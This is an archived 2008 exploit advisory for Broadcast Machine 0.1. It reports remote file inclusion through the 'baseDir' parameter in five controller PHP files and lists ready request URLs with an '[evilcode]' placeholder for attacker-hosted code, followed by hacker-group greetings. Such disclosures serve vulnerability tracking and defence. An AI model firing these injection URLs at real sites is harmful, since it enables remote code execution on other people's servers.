broadcast-rfi.txt

2008-12-01T00:00:00
ID PACKETSTORM:72457
Type packetstorm
Reporter NoGe
Modified 2008-12-01T00:00:00

Description

                                        
                                            `=================================================================================================================  
  
  
[o] Broadcast Machine 0.1 Multiple Remote File Inclusion Vulnerability  
  
Software : Broadcast Machine version 0.1  
Vendor : http://code.google.com/p/broadcastmachine/  
View Source : https://svn.participatoryculture.org/svn/dtv/trunk/bmachine2/  
Author : NoGe  
Contact : noge[dot]code[at]gmail[dot]com  
Blog : http://evilc0de.blogspot.com  
  
  
=================================================================================================================  
  
  
[o] Vulnerable file  
  
all file below is affected by "baseDir" parameter  
  
controllers/MySQLController.php  
  
controllers/SQLController.php  
  
controllers/SetupController.php  
  
controllers/VideoController.php  
  
controllers/ViewController.php  
  
  
  
[o] Exploit  
  
  
http://localhost/[path]/controllers/MySQLController.php?baseDir=[evilcode]  
  
http://localhost/[path]/controllers/SQLController.php?baseDir=[evilcode]  
  
http://localhost/[path]/controllers/SetupController.php?baseDir=[evilcode]  
  
http://localhost/[path]/controllers/VideoController.php?baseDir=[evilcode]  
  
http://localhost/[path]/controllers/ViewController.php?baseDir=[evilcode]  
  
  
=================================================================================================================  
  
  
[o] Greetz  
  
MainHack BrotherHood [ http://serverisdown.org/blog/]  
Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa  
H312Y yooogy mousekill }^-^{ kaka11 martfella  
skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke  
  
GANYANG MALINGSIAL!!! [ http://malingsial.serverisdown.org/ ]  
  
  
=================================================================================================================  
  
  
`